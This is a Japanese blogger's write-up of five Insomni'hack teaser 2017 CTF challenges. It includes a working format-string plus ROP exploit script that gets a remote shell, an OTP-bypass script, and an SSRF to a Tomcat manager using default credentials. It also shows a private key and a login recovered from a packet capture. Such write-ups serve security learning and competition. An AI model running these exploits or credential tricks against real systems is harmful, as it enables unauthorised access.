Insomni'hack teaser 2017に参加。250ptで93位。
baby (Pwn 50)
NX、PIE、FullRELROが有効なx86-64 ELF。
# file baby baby: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/, for GNU/Linux 2.6.32, not stripped # gdb -q ./baby Reading symbols from ./baby...(no debugging symbols found)...done. gdb-peda$ checksec CANARY : ENABLED FORTIFY : disabled NX : ENABLED PIE : ENABLED RELRO : FULL
TCP 1337で接続を待ち受けるfork server型になっており、
- Stack buffer overflow
- Format string bug
- Heap overflow
Format string bugでcanaryや実行ファイル、libcのベースアドレスをリークした後、Stack buffer overflowからROPして解いた。 libcのベースアドレスはmain関数からのリターンアドレスを使って計算することができる。
from minipwn import * def stack_overflow(s, buf): print recvuntil(s, '> ') sendline(s, '1') print recvuntil(s, '? ') sendline(s, str(len(buf)+1)) sendline(s, buf) print recvline(s) def format_string(s, buf): print recvuntil(s, '> ') sendline(s, '2') print recvuntil(s, '> ') sendline(s, buf) data = recvline(s) print recvuntil(s, '> ') sendline(s, '') return data #s = socket.create_connection(('localhost', 1337)) s = socket.create_connection(('', 1337)) data = format_string(s, '%138$p.%139$p.%140$p.%158$p') addrs = [int(x,16) for x in data.split('.')] canary, saved_ebp, bin_base, libc_base = addrs[0], addrs[1], addrs[2]-0x19cf, addrs[3]-0x20830 print "[+] canary = %x" % canary print "[+] saved_ebp = %x" % saved_ebp print "[+] bin_base = %x" % bin_base print "[+] libc_base = %x" % libc_base addr_bss = bin_base + 0x0000000000203010 addr_csu_init1 = bin_base + 0x1c7e addr_csu_init2 = bin_base + 0x1c68 addr_pop_rdi = bin_base + 0x1c8b got_recv = bin_base + 0x202eb8 #libc_system = libc_base + 0x0000000000045380 #addr_pop_rcx = libc_base + 0x00050233 libc_system = libc_base + 0x0000000000045390 addr_pop_rcx = libc_base + 0x000fc3e2 buf = 'A' * 0x408 buf += p64(canary) buf += 'BBBBBBBB' buf += struct.pack('<QQQQQQQQ', addr_csu_init1, 0, 0, 1, got_recv, 16, addr_bss, 4) buf += p64(addr_pop_rcx) + p64(0) buf += struct.pack('<QQQQQQQQ', addr_csu_init2, 0, 0, 1, 0, 0, 0, 0) buf += p64(addr_pop_rdi) + p64(addr_bss) buf += p64(libc_system) stack_overflow(s, buf) s.sendall('/bin/sh <&4 >&4\x00') print "[+] got a shell!" interact(s)
$ python Welcome to baby's first pwn. Pick your favorite vuln : 1. Stack overflow 2. Format string 3. Heap Overflow 4. Exit Your choice > Simply type '\n' to return Your format > Your format > [+] canary = 7971cd723454900 [+] saved_ebp = 7ffe526fc540 [+] bin_base = 55f1410d6000 [+] libc_base = 7f129d29e000 Welcome to baby's first pwn. Pick your favorite vuln : 1. Stack overflow 2. Format string 3. Heap Overflow 4. Exit Your choice > How much bytes you want to send ? Good luck ! [+] got a shell! id uid=1001(baby) gid=1001(baby) groups=1001(baby) ls baby flag cat flag INS{if_you_haven't_solve_it_with_the_heap_overflow_you're_a_baby!}
cryptoquizz (Misc/Crypto 50)
ランダムに与えられる暗号学者の生年を答える問題。 100回繋いでリストを作り、それぞれ対応するWikipediaのページから特定できるものを補完。 残りは人力でGoogle検索して埋めた。
from minipwn import * data = """Arjen K. Lenstra [1956] Lars Knudsen [1962] Xuejia Lai [1954] Daniel Bleichenbacher [1964] Douglas Stinson [1956] Claus-Peter Schnorr [1943] Niels Ferguson [1965] Yvo Desmedt [1956] Ron Rivest [1947] Antoine Joux [1967] Michael O. Rabin [1931] Jim Massey [1934] Markus Jakobsson [1968] Martin Hellman [1945] Alex Biryukov [1969] Yehuda Lindell [1971] Joan Daemen [1965] Horst Feistel [1915] Kaisa Nyberg [1948] Ralph Merkle [1952] Paul Kocher [1973] Paulo Barreto [1965] Whitfield Diffie [1944] Mitsuru Matsui [1961] David Naccache [1967] Phil Rogaway [1962] Eli Biham [1960] Adi Shamir [1952] Ronald Cramer [1968] Shai Halevi [1966] Donald Davies [1924] Moni Naor [1961] Jacques Stern [1949] Amos Fiat [1956] Victor S. Miller [1947] Paul van Oorschot [1962] Nigel P. Smart [1967] Serge Vaudenay [1968] Ross Anderson [1956] Dan Boneh [1969] Jacques Patarin [1965] Rafail Ostrovsky [1963] Daniel J. Bernstein [1971] Tatsuaki Okamoto [1952] """ birth_year = {} for line in data.splitlines(): name, birth = line[:-1].split(' [') birth_year[name] = birth s = socket.create_connection(('', 1031)) print s.recv(8192) while True: data = s.recv(8192) if not data: break m ='~~ What is the birth year of (.+?) \?', data) if m: name = print name, birth_year[name] sendline(s, birth_year[name]) else: print data s.close()
$ python ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ Hello, young hacker. Are you ready to fight rogue machines ? ~~ ~~ Now, you'll have to prove us that you are a genuine ~~ ~~ cryptographer. ~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Douglas Stinson 1956 Whitfield Diffie 1944 Lars Knudsen 1962 Antoine Joux 1967 David Naccache 1967 Donald Davies 1924 Jacques Stern 1949 Serge Vaudenay 1968 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ OK, young hacker. You are now considered to be a ~~ ~~ INS{GENUINE_CRYPTOGRAPHER_BUT_NOT_YET_A_PROVEN_SKILLED_ONE} ~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
bender_safe (Reverse 50)
# file bender_safe bender_safe: ELF 32-bit MSB executable, MIPS, MIPS-II version 1 (SYSV), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=76438e9ed749bcfc6e191e548da153d0d3b3ee28, not stripped
16文字のチャレンジ文字列から計算される8文字のレスポンスを答える問題。 QEMUベースの高機能トレーサーqiraでトレースしながら、一文字ずつ計算式をリバーシングした。
下の図は3文字目の判定に失敗したあたりを見ているところ。 左側のレジスタ値とメモリのスナップショットを見ながら、右側のグラフでどのように比較される値が計算されているかを調べる。
from minipwn import * #s = socket.create_connection(('localhost', 4000)) s = socket.create_connection(('', 31337)) print recvuntil(s, '\n') print recvuntil(s, '\n') otp = recvuntil(s, '\n') print otp table = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\x00\x00\x00\x00-------------------------------' buf = otp[0x0] buf += otp[0xf] buf += chr(ord(otp[0x7]) ^ (-0x5a) ^ (-0x67) ^ 0x7f) if ord(otp[0x7]) < 0x41 else chr(ord(otp[0x7]) ^ 0x4b ^ 0x61 ^ 0xa) buf += table[table.index(otp[0x3]) - 0xa] if ord(otp[0x3]) < 0x41 else table[table.index(otp[0x3]) + 0xa] buf += table[table.index(otp[0x4]) - 0xa] if ord(otp[0x4]) < 0x41 else table[table.index(otp[0x4]) + 0xa] buf += table[abs(ord(otp[1])-ord(otp[2])) % 0x23] buf += table[abs(ord(otp[5])-ord(otp[6])) % 0x23] buf += chr(ord(otp[0x8]) ^ (-0x5a) ^ (-0x67) ^ 0x7f) if ord(otp[0x8]) < 0x41 else chr(ord(otp[0x8]) ^ 0x4b ^ 0x61 ^ 0xa) sendline(s, buf) interact(s)
$ python Welcome to Bender's passwords storage service Here's your OTP challenge : 5FKU25OCL8GMEZZB _ ( ) H H _H_ .-'-.-'-. / \ | | | .-------'._ | / / '.' '. \ | \ \ @ @ / / | '---------' | _______| | .'-+-+-+| | '.-+-+-+| INS{Angr_is_great!_Oh_angr_is_great!_Angr_angr_angr} | """""" | '-.__ __.-' """ This is Bender's password vault storage I have 54043195528445952 bytes of memory for storage! Although 54043195528444928 of which is used to store my fembots videos...HiHiHi! Your passwords are safe with me meatbag! ------------------------------- | | | 1. View passwords | | 2. Enter new passwords | | 3. View admin password | | 4. Exit | | | ------------------------------- 4 *** Connection closed by remote host ***
smarttomcat (Web 50)
パラメータで与えられたURLにアクセスするスクリプトが置かれたウェブサイト。 Tomcat Manager(http://localhost:8080/manager/html)にアクセスさせるようにすると、401 Unauthorizedエラーが返ってくる。 デフォルトの設定ファイルでコメントアウトされているアカウント情報でBasic認証の突破を試みると、フラグが得られた。
$ curl -v '' --data 'u=http%3A%2F%2Ftomcat%3Atomcat%40localhost%3A8080%2Fmanager%2Fhtml' * Trying * Connected to ( port 80 (#0) > POST /index.php HTTP/1.1 > Host: > User-Agent: curl/7.47.0 > Accept: */* > Content-Length: 66 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 66 out of 66 bytes < HTTP/1.1 200 OK < Date: Sun, 22 Jan 2017 08:41:27 GMT < Content-Type: text/html; charset=UTF-8 < Content-Length: 91 < Connection: keep-alive < Server: Apache/2.4.18 (Ubuntu) < Vary: User-Agent,Accept-Encoding < We won't give you the manager, but you can have the flag : INS{th1s_is_re4l_w0rld_pent3st} * Connection #0 to host left intact
The Great Escape - part 1 (Forensics 50)
pcapng形式のパケットキャプチャファイルが与えられる。 Wiresharkで開くと、FTPでssc.keyというファイル名で秘密鍵が転送されていることがわかる。
$ strings -n8 TheGreatEscape-3859f9ed7682e1857aaa4f2bcb5867ea6fe88c74.pcapng | awk '/-----BEGIN PRIVATE KEY-----/,/-----END PRIVATE KEY-----/' -----BEGIN PRIVATE KEY----- MIIJQwIBADANBgkqhkiG9w0BAQEFAASCCS0wggkpAgEAAoICAQC5twyPH+2U6X0Q uxOKPTHSR6MkXGSvAz+Ax+G9DKEiBLuTTfl7dNv4oswdmT9nWlSY1kxZatNwlUF8 WAuGLntO5xTEmOJlMtBFrWGD+DVpCE9KORGvyif8e4xxi6vh4mkW78IxV03VxHM0 mk/cq5kkERfWQW81pVeYm9UAm4dj+LcCwQ9aGd/vfTtcACqS5OGtELFbsHJuFVyn (snip) -----END PRIVATE KEY----- (snip)
のサーバ鍵であると推測し、Wiresharkに52.214.142.175, 443, http
Frame 2236: 646 bytes on wire (5168 bits), 646 bytes captured (5168 bits) on interface 0 Linux cooked capture Internet Protocol Version 4, Src:, Dst: Transmission Control Protocol, Src Port: 51398, Dst Port: 443, Seq: 569, Ack: 153, Len: 578 Secure Sockets Layer [2 Reassembled SSL segments (523 bytes): #2236(1), #2236(522)] Hypertext Transfer Protocol POST /api/user.php HTTP/1.1\r\n Host:\r\n User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0\r\n Accept: application/json, text/plain, */*\r\n Accept-Language: en-US,en;q=0.5\r\n Accept-Encoding: gzip, deflate, br\r\n Content-Type: application/x-www-form-urlencoded\r\n Referer:\r\n Content-Length: 38\r\n Cookie: PHPSESSID=3u5dqmfudc7ap1di0nmfjgtjm3\r\n FLAG: INS{OkThatWasWay2Easy}\r\n Connection: keep-alive\r\n \r\n [Full request URI:] [HTTP request 1/6] [Response in frame: 2247] [Next request in frame: 2248] File Data: 38 bytes HTML Form URL Encoded: application/x-www-form-urlencoded Form item: "action" = "login" Form item: "name" = "rogue" Form item: "password" = "rogue"
50pt問題しか解くことができず厳しかった。 他に解きたかった問題は以下。
- The Great Escape - part 2 (Web 200)
- Shobot (Web 200)
- mindreader (Mobile 250)